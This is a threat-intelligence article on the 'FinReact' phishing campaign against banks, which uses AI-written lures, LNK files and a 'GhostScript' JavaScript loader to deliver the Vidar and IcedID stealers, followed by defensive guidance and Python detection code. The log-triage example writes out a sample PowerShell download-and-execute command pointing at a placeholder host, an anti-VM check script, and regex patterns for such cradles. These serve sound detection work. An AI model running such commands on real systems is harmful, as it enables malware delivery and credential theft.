AI-Powered 'FinReact' Phishing Campaign Targets Financial Sector with Evasive JavaScript Loader

'FinReact' Phishing Campaign Uses AI-Generated Lures and 'GhostScript' Loader to Target Banks

HIGH
July 1, 2026
6m read
Phishing, Malware, Threat Intelligence

Related Entities

Organizations

Proofpoint

Products & Tech

Generative AI

Other

GhostScript, Vidar, IcedID

Full Report

Executive Summary

Security researchers at Proofpoint have identified a sophisticated, large-scale phishing campaign, 'FinReact', targeting the financial services sector. This operation is notable for its use of generative AI to craft highly convincing and personalized email lures, making them difficult to detect. The campaign's goal is to deploy information-stealing malware, such as Vidar and IcedID, by tricking victims into executing a malicious LNK file. This triggers a multi-stage infection process involving a new, evasive JavaScript loader named GhostScript. The campaign demonstrates a significant evolution in the tactics of financially motivated cybercriminals.


Threat Overview

The 'FinReact' campaign represents a significant step up in the quality of phishing attacks. By leveraging generative AI, the attackers can create emails that are grammatically perfect, contextually relevant, and personalized to the target, often appearing as a reply to an existing email thread.

  • Targeting: The campaign is specifically aimed at employees in banks, investment firms, and other financial institutions.
  • Initial Delivery: The attack begins with an AI-generated email containing a password-protected ZIP file. The password is included in the body of the email, a technique designed to bypass automated email attachment scanners.
  • Infection Chain:
    1. The user opens the ZIP file and then the malicious LNK shortcut inside.
    2. The LNK file executes a PowerShell command.
    3. The PowerShell command downloads the GhostScript JavaScript loader.
    4. GhostScript performs anti-analysis checks (e.g., for sandboxes and VMs).
    5. If the checks pass, it downloads and executes the final payload, which is an information stealer like Vidar or IcedID.

Technical Analysis

The GhostScript loader is a key component of this campaign. It is a novel piece of malware designed for evasion. Its ability to check for virtualized environments before proceeding makes it difficult for automated analysis systems to detonate and study the final payload. This ensures that the attackers' more valuable malware (the info-stealers) is only exposed in real victim environments.

The use of AI for lure creation is the other major innovation. This allows the attackers to scale their operation without sacrificing quality, producing thousands of unique, high-quality phishing emails that can bypass reputation-based and signature-based email security filters.

MITRE ATT&CK TTPs

Impact Assessment

A successful compromise can have significant financial and operational consequences for the targeted firms:

  • Credential Theft: The theft of browser credentials and session cookies can allow attackers to bypass MFA and gain access to corporate banking portals, trading platforms, and internal systems.
  • Financial Fraud: Attackers can use the stolen access to initiate fraudulent transactions, a primary goal for financially motivated actors.
  • Data Breach: The info-stealers can harvest a wide range of sensitive data from the compromised workstation, leading to a data breach.
  • Ransomware Foothold: Stolen credentials are often sold to or used by other threat actors, including ransomware groups, as an initial access vector for more disruptive attacks.

Detection & Response

  • Detection:
    • Email Security: Look for emails containing password-protected ZIP files with the password in the body. While this pattern sometimes has legitimate uses, it is also a common evasion tactic and should be flagged for higher scrutiny.
    • Endpoint Monitoring: Monitor for the execution of LNK files that spawn PowerShell. Create EDR rules to detect and block this behavior. D3FEND's Process Analysis is key here.
    • PowerShell Logging: Enable PowerShell Script Block Logging (Event ID 4104) to capture the content of executed PowerShell scripts, which can reveal the download URL used by the LNK file.
  • Response:
    • If a user reports falling for the phish, immediately isolate their workstation from the network.
    • Reset all of the user's credentials, especially for financial and cloud-based systems.
    • Perform a forensic analysis of the machine to identify the final payload and any C2 communication.
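The Email Security check described above, as an added example that is not part of the Proofpoint report or the article's own tooling: a gateway-side Python triage routine that inspects a ZIP attachment's central directory for the encryption flag and for LNK entries, and pairs that with a password hint found in the message body. Everything here is constructed for the example: the lure text, the file names, and the archives themselves, which are produced by a minimal STORE-only ZIP writer that merely sets the encryption flag bit so the check can run offline (no real campaign artifacts and no real encryption are involved).

```python
import io
import re
import struct
import zipfile
import zlib
from typing import Dict, List, Tuple

# Heuristic for "the password is in the body": keyword, optional "is"/":"/"=", then a token.
PASSWORD_HINT = re.compile(
    r"(?i)\b(?:password|passcode|pwd)\b\s*(?:is|:|=)?\s*['\"]?([^\s'\"<>]{4,})"
)


def build_zip(entries: List[Tuple[str, bytes]], encrypted: bool) -> bytes:
    """Constructed test fixture: a minimal STORE-only ZIP writer.

    When `encrypted` is True it sets general-purpose flag bit 0 (the 'encrypted'
    flag) so the archive is reported as password-protected by ZIP parsers. The
    payload bytes are never decrypted or opened; only the directory is inspected.
    """
    flags = 0x0001 if encrypted else 0x0000
    local, central, offset = b"", b"", 0
    for name, data in entries:
        fname = name.encode("ascii")
        crc = zlib.crc32(data) & 0xFFFFFFFF
        # Local file header (30 bytes + name); mod date 0x21 == 1980-01-01.
        lh = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, 0, 0, 0x21,
                         crc, len(data), len(data), len(fname), 0) + fname
        local += lh + data
        # Central directory header (46 bytes + name).
        central += struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, 0, 0,
                               0x21, crc, len(data), len(data), len(fname),
                               0, 0, 0, 0, 0, offset) + fname
        offset += len(lh) + len(data)
    # End of central directory record (22 bytes).
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, len(entries), len(entries),
                       len(central), offset, 0)
    return local + central + eocd


def inspect_attachment(zip_bytes: bytes) -> Dict:
    """Read only the ZIP directory: encryption flag and any .lnk entries."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
    names = [i.filename for i in infos]
    return {
        "encrypted": any(i.flag_bits & 0x1 for i in infos),
        "lnk_entries": [n for n in names if n.lower().endswith(".lnk")],
        "entries": names,
    }


def triage_email(body: str, zip_bytes: bytes) -> Dict:
    """Combine archive structure with a body-text password hint into a verdict."""
    info = inspect_attachment(zip_bytes)
    hint = PASSWORD_HINT.search(body)
    reasons = []
    if info["encrypted"] and hint:
        reasons.append("encrypted_zip_with_password_in_body")
    if info["lnk_entries"]:
        reasons.append("lnk_inside_archive")
    # Both signals together match the FinReact delivery pattern exactly.
    verdict = "quarantine" if len(reasons) == 2 else ("review" if reasons else "allow")
    return {
        "verdict": verdict,
        "reasons": reasons,
        "password_candidate": hint.group(1).rstrip(".,;!") if hint else None,
        **info,
    }


# Constructed sample messages (not real lures or IoCs).
SAMPLE_LURE_BODY = ("Hi Tom, per our call the updated statements are attached. "
                    "The archive password is Q3-Review2026. Regards, Anna")
SAMPLE_LURE_ZIP = build_zip([("Q3_Statements.pdf.lnk", b"not a real shortcut")], encrypted=True)

SAMPLE_BENIGN_BODY = "Attached are the slides from this morning's review."
SAMPLE_BENIGN_ZIP = build_zip([("slides.pdf", b"%PDF-1.4 placeholder")], encrypted=False)

if __name__ == "__main__":
    for label, body, blob in (("lure", SAMPLE_LURE_BODY, SAMPLE_LURE_ZIP),
                              ("benign", SAMPLE_BENIGN_BODY, SAMPLE_BENIGN_ZIP)):
        print(label, triage_email(body, blob))
```

The routine never extracts or decrypts the attachment; it reads only the central directory, which is exactly what a password-protected archive still exposes, so a gateway can score it without the password.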

Mitigation

  • User Training: This is critical. Train users to be suspicious of any email with an attachment, especially ZIP files, and to never open files from unverified sources. They should be taught to report suspicious emails immediately.
  • Block LNK files: Where possible, configure email gateways to block incoming LNK files within ZIP archives. Alternatively, configure Windows to prevent LNK files from being executed from network or removable drives.
  • Attack Surface Reduction (ASR): Use Microsoft Defender's ASR rules to block Office applications and script execution from creating child processes, which can break the infection chain.
  • Endpoint Hardening: Restrict the use of PowerShell for standard users where it is not required for their job function.

Timeline of Events

July 1, 2026: This article was published.

MITRE ATT&CK Mitigations

Training users to recognize phishing indicators, especially those involving unusual attachments like password-protected ZIPs, is the first line of defense.

Using Attack Surface Reduction (ASR) rules or application control to block the execution of scripts and LNK files from email can prevent the infection chain from starting.

Modern EDR/AV solutions with behavioral analysis can detect and block suspicious activities like an LNK file launching PowerShell to download a payload.

Email gateways should be configured to scan and potentially block or quarantine password-protected archives, which are a common malware delivery technique.

D3FEND Defensive Countermeasures

Given the use of sophisticated AI-generated lures, technical controls alone may not be sufficient. A robust, ongoing security awareness training program is essential. For the financial sector employees targeted by FinReact, this training should specifically focus on the TTP of receiving password-protected ZIP files with the password in the email body. Phishing simulations that mimic this exact technique should be conducted regularly to condition users to recognize and report such emails rather than opening the attachments. A well-trained user is the most effective sensor for detecting high-quality phishing attempts.

Implement application control policies to prevent the execution of unexpected scripts and files. Specifically, configure Windows Attack Surface Reduction (ASR) rules to block the execution of LNK files and to prevent scripts from launching downloaded content. For example, the ASR rule 'Block execution of potentially obfuscated scripts' can interfere with the GhostScript loader. A more stringent approach is to use a tool like AppLocker to deny the execution of LNK files and scripts from user-writable locations like the Downloads folder or AppData, which would break the FinReact infection chain at its earliest stage.

Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) across all endpoints via Group Policy. The FinReact campaign uses a malicious LNK file to launch a PowerShell download cradle. While the initial command might be simple, detailed logging will capture the full content of any de-obfuscated scripts or further commands executed in memory. This provides invaluable forensic data for incident response and can be fed into a SIEM to create high-fidelity alerts for suspicious PowerShell activity, such as download cradles or anti-analysis checks.
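To show what the Endpoint Monitoring and PowerShell Logging guidance in the Detection section looks like as detection logic, and what this paragraph means by turning Event ID 4104 content into SIEM alerts, here is an added Python example that is not from the Proofpoint report or the article: it triages constructed process-creation records (Sysmon Event ID 1 style, the same fields a 4688 event carries) and 4104 script-block records, decodes a -EncodedCommand argument, and tags download cradles, anti-VM checks and script-host launches. The host names, the placeholder URL and the sample script text are invented for the example and mimic the behaviours the report describes; they are not GhostScript's actual code.

```python
import base64
import re
from typing import Dict, List, Optional

# Behaviours from the report: an LNK-launched PowerShell download cradle, and a
# loader that checks for sandboxes/VMs before fetching the stealer.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer)",
    re.IGNORECASE)
INVOKE_EXPR = re.compile(r"(\bIEX\b|Invoke-Expression)", re.IGNORECASE)
ANTI_VM = re.compile(
    r"(VMware|VirtualBox|VBOX|QEMU|Hyper-V|Win32_ComputerSystem|Win32_BIOS)", re.IGNORECASE)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta)\.exe", re.IGNORECASE)
SUSPICIOUS_SWITCHES = re.compile(
    r"(?i)(-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-e(?:c|nc|ncodedcommand)?\s)")
URL = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = re.search(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def script_block_indicators(text: str) -> List[str]:
    """Tag a script block (or a decoded command line) with the behaviours above."""
    hits = []
    if DOWNLOAD_CRADLE.search(text) and INVOKE_EXPR.search(text):
        hits.append("download_cradle")          # fetch-and-execute in memory
    elif DOWNLOAD_CRADLE.search(text):
        hits.append("remote_download")
    if ANTI_VM.search(text):
        hits.append("anti_vm_check")
    if SCRIPT_HOST.search(text):
        hits.append("script_host_launch")       # handing off to a JS/VBS host
    return hits


def is_lnk_style_powershell_spawn(ev: Dict) -> bool:
    """explorer.exe (the shell opening a shortcut) starting PowerShell with evasive switches."""
    parent = ev.get("parent_image", "").lower()
    image = ev.get("image", "").lower()
    return (parent.endswith("explorer.exe")
            and image.endswith(("powershell.exe", "pwsh.exe"))
            and bool(SUSPICIOUS_SWITCHES.search(ev.get("command_line", ""))))


def triage(events: List[Dict]) -> List[Dict]:
    """Produce SIEM-style alerts from a mixed stream of process and 4104 events."""
    alerts = []
    for ev in events:
        if ev["event_id"] == 1 and is_lnk_style_powershell_spawn(ev):
            decoded = decode_encoded_command(ev["command_line"]) or ev["command_line"]
            alerts.append({"rule": "lnk_spawns_powershell", "host": ev["host"],
                           "indicators": script_block_indicators(decoded),
                           "urls": URL.findall(decoded)})
        elif ev["event_id"] == 4104:
            hits = script_block_indicators(ev["script_block_text"])
            if hits:
                alerts.append({"rule": "suspicious_script_block", "host": ev["host"],
                               "indicators": hits, "urls": URL.findall(ev["script_block_text"])})
    return alerts


# Constructed sample telemetry (placeholder URL and hosts, not real IoCs).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader.js')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"event_id": 1, "host": "WS-FIN-07", "parent_image": r"C:\Windows\explorer.exe",
     "image": PS_PATH, "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"event_id": 4104, "host": "WS-FIN-07",
     "script_block_text": "$cs = Get-WmiObject Win32_ComputerSystem; "
                          "if ($cs.Model -match 'VMware|VirtualBox') { exit }; "
                          "Start-Process wscript.exe -ArgumentList \"$env:TEMP\\loader.js\""},
    {"event_id": 4104, "host": "WS-FIN-12",
     "script_block_text": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"event_id": 1, "host": "WS-FIN-12", "parent_image": r"C:\Windows\explorer.exe",
     "image": PS_PATH, "command_line": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The process-creation rule fires on the parent/child pair plus the switches rather than on the LNK itself, because the shortcut is gone by the time the child appears; the 4104 rule then recovers the URL and the later stages, which is the forensic value the logging paragraph describes.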

Article Author

Jason Gomes


• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

phishing, ai, social engineering, malware, infostealer, icedid, vidar, financial services
